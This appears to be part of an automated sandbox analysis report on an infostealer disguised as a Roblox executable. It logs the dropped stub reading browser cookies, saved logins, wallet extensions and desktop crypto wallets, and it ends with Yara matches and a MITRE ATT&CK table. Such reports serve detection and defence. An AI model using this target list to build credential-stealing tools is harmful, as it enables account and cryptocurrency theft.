                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.files
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js\index-dir
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb\Icons
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\glean\events
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\saved-telemetry-pings
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\sessionstore-backups
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCache
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\glean\db
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons Monochrome
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\1dcaa933-a69d-41cc-acb5-708980d119e5
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb\Icons Monochrome
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.files
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.files
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databasesJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrialsJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pdadjkfkgcafgbceimcpbkalnfnepbnkJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nphplpgoakhhjchkkhmiggakijnkhfndJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDBJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.logJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\6f463e7a-ef1f-4e71-ae85-88471a72b3d6Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareportingJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\b79425d0-2f84-41d2-84d3-9f598259534dJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web ApplicationsJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download ServiceJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\CacheJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\permanent\chrome\idb\2918063365piupsah.filesJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\NetworkJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\881ae04a-fa90-4a62-8eee-5ae000467040Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension SettingsJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\permanent\chromeJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BookmarksJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb\Icons MaskableJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\WebStorageJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\places.sqlite-walJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation PlatformJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\crashesJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Session StorageJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloadsJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons MaskableJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalStorageConfigDBJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabaseJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons MaskableJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\security_stateJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\FilesJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local StorageJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storageJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasmJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement TrackerJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldoomlJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\SessionsJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabaseJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\archivedJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCacheJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\697416b8-55c0-41ac-9636-a06aa38f99e9Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\IconsJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ghbmnnjooekpmoecnnnilnnbdlolhkhiJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics DatabaseJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_dbJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncmJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\permanent\chrome\idb\3561288849sdhlie.filesJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\glean\pending_pingsJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqliteJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons MaskableJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hmeobnfnfcmdkdcmlblgagmfpfboieafJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\b7e6c706-6d19-4b9e-9c37-e5ee870c2129Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_storeJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StorageJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension ScriptsJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\EncryptionJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\DefaultJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\places.sqlite-shmJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\kz8kl7vh.defaultJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibagJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons MonochromeJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_dbJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\jsJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons MonochromeJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\af2cf244-1bda-453b-baae-9793e72e9be8Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\minidumpsJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\archived\2023-10Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache\Cache_DataJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_dbJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldbJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldbJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\walletsJump to behavior
                  Source: Yara match | File source: 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000003.00000002.1951447889.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: Process Memory Space: roblox1.exe PID: 1364, type: MEMORYSTR
                  Source: Yara match | File source: Process Memory Space: stub.exe PID: 3428, type: MEMORYSTR
                  Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe, type: DROPPED
                  Source: Yara match | File source: 00000003.00000002.1943280066.00000213BDF10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000003.00000002.1951447889.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: Process Memory Space: roblox1.exe PID: 1364, type: MEMORYSTR
                  Source: Yara match | File source: Process Memory Space: stub.exe PID: 3428, type: MEMORYSTR
                  Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe, type: DROPPED

                  Remote Access Functionality

                  Source: Yara match | File source: 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000003.00000002.1951447889.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: Process Memory Space: roblox1.exe PID: 1364, type: MEMORYSTR
                  Source: Yara match | File source: Process Memory Space: stub.exe PID: 3428, type: MEMORYSTR
                  Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe, type: DROPPED
                  Source: Yara match | File source: 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000003.00000002.1951447889.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: Process Memory Space: roblox1.exe PID: 1364, type: MEMORYSTR
                  Source: Yara match | File source: Process Memory Space: stub.exe PID: 3428, type: MEMORYSTR
                  Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe, type: DROPPED

                  MITRE ATT&CK Matrix
                  (each row lists one technique per tactic column; a leading number is the signature count shown for that technique in the report)

                  Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                  Gather Victim Identity Information | Acquire Infrastructure | 1 Valid Accounts | 341 Windows Management Instrumentation | 1 DLL Side-Loading | 1 DLL Side-Loading | 21 Disable or Modify Tools | 1 OS Credential Dumping | 11 System Time Discovery | Remote Services | 1 Archive Collected Data | 1 Ingress Tool Transfer | Exfiltration Over Other Network Medium | Abuse Accessibility Features
